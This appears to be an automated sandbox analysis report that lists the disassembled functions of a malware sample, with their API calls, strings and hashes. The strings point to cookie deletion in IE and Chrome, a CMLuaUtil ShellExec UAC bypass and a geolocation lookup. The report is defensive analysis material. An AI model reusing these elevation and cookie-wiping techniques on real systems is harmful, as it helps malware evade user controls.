Download Yara Rule

APIs

Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
PathFileExistsA.SHLWAPI(?), ref: 0040B779

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040B703
[IE cookies cleared!], xrefs: 0040B7C6, 0040B7E6
Cookies, xrefs: 0040B6FE
[IE cookies not found], xrefs: 0040B741

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 765ae880be48e449ae7364d2669d03fa3b9782201e1de0fd223495db34723536
Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
Opcode Fuzzy Hash: 765ae880be48e449ae7364d2669d03fa3b9782201e1de0fd223495db34723536
Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE

Function 00455903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8620d3e8ce065b11b930561beaabfff1f00a0110f02bd21ff71fdeb3ef1592c
Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
Opcode Fuzzy Hash: d8620d3e8ce065b11b930561beaabfff1f00a0110f02bd21ff71fdeb3ef1592c
Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA

Function 024C5B6A Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73f4216d9227424834ab683a62f21571e8b2afaadca920fe74bb7b8a40116277
Instruction ID: 7df43f3dccc7a5a373a440d7909cd5f5402dc346237ceb77b1229bb5bda2d7a5
Opcode Fuzzy Hash: 73f4216d9227424834ab683a62f21571e8b2afaadca920fe74bb7b8a40116277
Instruction Fuzzy Hash: AB11A276508219BFDB212F7AEC4496F7AAEDF85721B60056FF816D6240EA30D901CAB1

Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
int.LIBCPMT ref: 0040FC0F

Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B

std::_Facet_Register.LIBCPMT ref: 0040FC4B
std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
__CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D

Strings

P[G, xrefs: 0040FC94

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: P[G
API String ID: 2536120697-571123470
Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D

Function 0247FE56 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0247FE63
int.LIBCPMT ref: 0247FE76

Part of subcall function 0247D147: std::_Lockit::_Lockit.LIBCPMT ref: 0247D158
Part of subcall function 0247D147: std::_Lockit::~_Lockit.LIBCPMT ref: 0247D172

std::_Facet_Register.LIBCPMT ref: 0247FEB2
std::_Lockit::~_Lockit.LIBCPMT ref: 0247FED8
__CxxThrowException@8.LIBVCRUNTIME ref: 0247FEF4

Strings

P[G, xrefs: 0247FEFB

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: P[G
API String ID: 2536120697-571123470
Opcode ID: 66d1d2f93b0a437ba6194d5bb56da3cbca8cefc802f69fb3ca8fff7099274c15
Instruction ID: 1e346808c7ea7c91031740d5ef6690a6fd5478478e1817803962d5ec18800f27
Opcode Fuzzy Hash: 66d1d2f93b0a437ba6194d5bb56da3cbca8cefc802f69fb3ca8fff7099274c15
Instruction Fuzzy Hash: 45110631D00518E7CB14FBA5D8509EE77799F50724B21006FE8196B290EB70AF49CBD5

Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
InternetCloseHandle.WININET(00000000), ref: 0041A5B3
InternetCloseHandle.WININET(00000000), ref: 0041A5B6

Strings

http://geoplugin.net/json.gp, xrefs: 0041A54E

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: 8a2722a77a721669593b0367f0fdf2e0f92c97aa65a2f702c1d2453de3b58543
Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
Opcode Fuzzy Hash: 8a2722a77a721669593b0367f0fdf2e0f92c97aa65a2f702c1d2453de3b58543
Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6

Function 0044FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B

_free.LIBCMT ref: 0044FD29

Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED

_free.LIBCMT ref: 0044FD34
_free.LIBCMT ref: 0044FD3F
_free.LIBCMT ref: 0044FD93
_free.LIBCMT ref: 0044FD9E
_free.LIBCMT ref: 0044FDA9
_free.LIBCMT ref: 0044FDB4

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645

Function 024BFF42 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024BFC89: _free.LIBCMT ref: 024BFCB2

_free.LIBCMT ref: 024BFF90

Part of subcall function 024B6D2C: HeapFree.KERNEL32(00000000,00000000,?,024BFCB7,?,00000000,?,00000000,?,024BFF5B,?,00000007,?,?,024C046C,?), ref: 024B6D42
Part of subcall function 024B6D2C: GetLastError.KERNEL32(?,?,024BFCB7,?,00000000,?,00000000,?,024BFF5B,?,00000007,?,?,024C046C,?,?), ref: 024B6D54

_free.LIBCMT ref: 024BFF9B
_free.LIBCMT ref: 024BFFA6
_free.LIBCMT ref: 024BFFFA
_free.LIBCMT ref: 024C0005
_free.LIBCMT ref: 024C0010
_free.LIBCMT ref: 024C001B

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
Instruction ID: f008ae8a380ea54d4d33ac33eec79f010dcd63f74dc9a8c559547fdb9d1a7def
Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
Instruction Fuzzy Hash: F0115471540708B6E962B772CC05FDB7BBEAF08B01F81081EB69D66851D676B5484E60

Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\2iH7rqx9rQ.exe), ref: 00406835

Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9

CoUninitialize.OLE32 ref: 0040688E

Strings

[+] ShellExec success, xrefs: 00406873
[+] before ShellExec, xrefs: 00406856
[+] ucmCMLuaUtilShellExecMethod, xrefs: 0040681A
C:\Users\user\Desktop\2iH7rqx9rQ.exe, xrefs: 00406815, 00406818, 0040686A

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: InitializeObjectUninitialize_wcslen
String ID: C:\Users\user\Desktop\2iH7rqx9rQ.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
API String ID: 3851391207-2823921438
Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669

Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
int.LIBCPMT ref: 0040FEF2

Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B

std::_Facet_Register.LIBCPMT ref: 0040FF2E
std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
__CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70

Strings

H]G, xrefs: 0040FEEA

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: H]G
API String ID: 2536120697-1717957184
Opcode ID: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
Opcode Fuzzy Hash: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799

Function 02480139 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02480146
int.LIBCPMT ref: 02480159

Part of subcall function 0247D147: std::_Lockit::_Lockit.LIBCPMT ref: 0247D158
Part of subcall function 0247D147: std::_Lockit::~_Lockit.LIBCPMT ref: 0247D172

std::_Facet_Register.LIBCPMT ref: 02480195
std::_Lockit::~_Lockit.LIBCPMT ref: 024801BB
__CxxThrowException@8.LIBVCRUNTIME ref: 024801D7

Strings

H]G, xrefs: 02480151

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: H]G
API String ID: 2536120697-1717957184
Opcode ID: 0a2989e8c640b6c3179e3035855110f6a7cb0f7e06d84751caa425ed32edbe19
Instruction ID: d01e61610f21cddf2a3fcfe2ca66555a796ecb44ce1537d0a6096150837a0a50
Opcode Fuzzy Hash: 0a2989e8c640b6c3179e3035855110f6a7cb0f7e06d84751caa425ed32edbe19
Instruction Fuzzy Hash: 02110231920518EBCB15FBA5C9509EEB73A9F50724B20005FD8056B290EF70AF0ACF95

Function 024769CB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 55COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 024769EF
CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 02476A50

Strings

[+] CoGetObject SUCCESS, xrefs: 02476A5F
[-] CoGetObject FAILURE, xrefs: 02476A58, 02476A67
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 024769E4, 024769E9, 02476A28
$, xrefs: 02476A09

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $$[+] CoGetObject SUCCESS$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-4254711192
Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
Instruction ID: d850b152627591954b6550eef16a4fa1af102d3ce03a5cd19403f541a135892d
Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
Instruction Fuzzy Hash: C911A5B2910518ABDB10EBA5D864BDEB7BDDB44710F95406FE904E3140FB789E048A79

Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
GetLastError.KERNEL32 ref: 0040B2EE

Strings

\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
[Chrome Cookies found, cleared!], xrefs: 0040B314
[Chrome Cookies not found], xrefs: 0040B308
UserProfile, xrefs: 0040B2B4

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 19ecdb7ced69d29f5af132c45ee785ffad1437658d0d6b99857da4418a50d0d2
Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
Opcode Fuzzy Hash: 19ecdb7ced69d29f5af132c45ee785ffad1437658d0d6b99857da4418a50d0d2
Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE

Function 0248CBD6 Relevance: 10.5, APIs: 7, Instructions: 47windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0248CBEF

Part of subcall function 0248CC86: RegisterClassExA.USER32(00000030), ref: 0248CCD3
Part of subcall function 0248CC86: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0248CCEE
Part of subcall function 0248CC86: GetLastError.KERNEL32 ref: 0248CCF8

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0248CC26
lstrcpyn.KERNEL32(00473B68,0046C104,00000080), ref: 0248CC40
Shell_NotifyIcon.SHELL32(00000000,00473B50), ref: 0248CC56
TranslateMessage.USER32(?), ref: 0248CC62
DispatchMessageA.USER32(?), ref: 0248CC6C
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0248CC79

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID:
API String ID: 1970332568-0
Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
Instruction ID: f7d203cceec7b0a64f26888501013545e39d009dfa744439b5f7588dd583ada2
Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
Instruction Fuzzy Hash: 230144B1904344ABD7109FA5EC4CEDB7BBCE745B16F00403AF605E3162D7B8A285DB68

Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON

Download Yara Rule

Strings

BG, xrefs: 00406909
Rmc-I7G983, xrefs: 0040693F
C:\Users\user\Desktop\2iH7rqx9rQ.exe, xrefs: 00406927

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\2iH7rqx9rQ.exe$Rmc-I7G983$BG
API String ID: 0-3018786183
Opcode ID: 084835c7726d33dffcd5924f009c12fdbcd91b9ed5397a8456d33bd71e3ff665
Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
Opcode Fuzzy Hash: 084835c7726d33dffcd5924f009c12fdbcd91b9ed5397a8456d33bd71e3ff665
Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C

Function 02476737 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\2iH7rqx9rQ.exe, xrefs: 02476B8E
BG, xrefs: 02476B70
Rmc-I7G983, xrefs: 02476BA6

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\2iH7rqx9rQ.exe$Rmc-I7G983$BG
API String ID: 0-3018786183
Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
Instruction ID: 8a4e8bb32556f14526c9e0c720de872ffde00028ca9f2e123d148c52b17a7e3b
Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
Instruction Fuzzy Hash: 2EF0BB70B41721DBDB203B746D187FA364FE781796F01447BF52DE6261EB6488418A98

Function 004395FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00439789
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
__allrem.LIBCMT ref: 004397BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
__allrem.LIBCMT ref: 004397F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
Opcode Fuzzy Hash: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58

Function 024A9863 Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 024A99F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 024A9A0C
__allrem.LIBCMT ref: 024A9A23
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 024A9A41
__allrem.LIBCMT ref: 024A9A58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 024A9A76

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
Instruction ID: 0aee07a4777ec4da839d7eb9834df5d6aa74cbc5a7c060d94f40fe96de588bb1
Opcode Fuzzy Hash: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
Instruction Fuzzy Hash: C7810972A00716ABE7219E7ACC61BAB73EAEF50324F24452FE516D7780E770D900CB50

Function 024B2D3F Relevance: 9.2, APIs: 6, Instructions: 217COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024B2DCF
_free.LIBCMT ref: 024B2DE9
_free.LIBCMT ref: 024B2DF4
_free.LIBCMT ref: 024B2EC8
_free.LIBCMT ref: 024B2EE4

Part of subcall function 024AAABB: IsProcessorFeaturePresent.KERNEL32(00000017,024AAA8D,?,?,02471BC9,?,?,00000000,?,?,024AAAAD,00000000,00000000,00000000,00000000,00000000), ref: 024AAABD
Part of subcall function 024AAABB: GetCurrentProcess.KERNEL32(C0000417), ref: 024AAADF
Part of subcall function 024AAABB: TerminateProcess.KERNEL32(00000000), ref: 024AAAE6

_free.LIBCMT ref: 024B2EEE

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$Process$CurrentFeaturePresentProcessorTerminate
String ID:
API String ID: 2329545287-0
Opcode ID: 4118d0c7a5faff20c3bdd9400e50d9846731c96832acf5071bf3a173b9413d13
Instruction ID: 25bea1ba22389f1628c24993eac5a61baae0387b4e23e363b318f64c536b6557
Opcode Fuzzy Hash: 4118d0c7a5faff20c3bdd9400e50d9846731c96832acf5071bf3a173b9413d13
Instruction Fuzzy Hash: 5651773A9042156BDF26DF6AD840BEBB7ADDF45720F14015FED049B240EBB29D42C6B0

Function 024B9BB7 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024B9E08,00000001,00000001,00000006), ref: 024B9C11
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,024B9E08,00000001,00000001,00000006), ref: 024B9C97
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,00000006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024B9D91
__freea.LIBCMT ref: 024B9D9E

Part of subcall function 024B6D66: RtlAllocateHeap.NTDLL(00000000,024A468A,?), ref: 024B6D98

__freea.LIBCMT ref: 024B9DA7
__freea.LIBCMT ref: 024B9DCC

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a4f5f7d7e0253137201d24c54ea4cf660dd43f3a14d4cde2709bba3cbd133d87
Instruction ID: 12c5c35d72d3266e23cdbc2e754e668cd58b346daf082b694851a7684925c1e4
Opcode Fuzzy Hash: a4f5f7d7e0253137201d24c54ea4cf660dd43f3a14d4cde2709bba3cbd133d87
Instruction Fuzzy Hash: 4651C472610216ABDB268F66CC40EEB77AEEF84754F15462EFE04D6240EB34EC51CA70

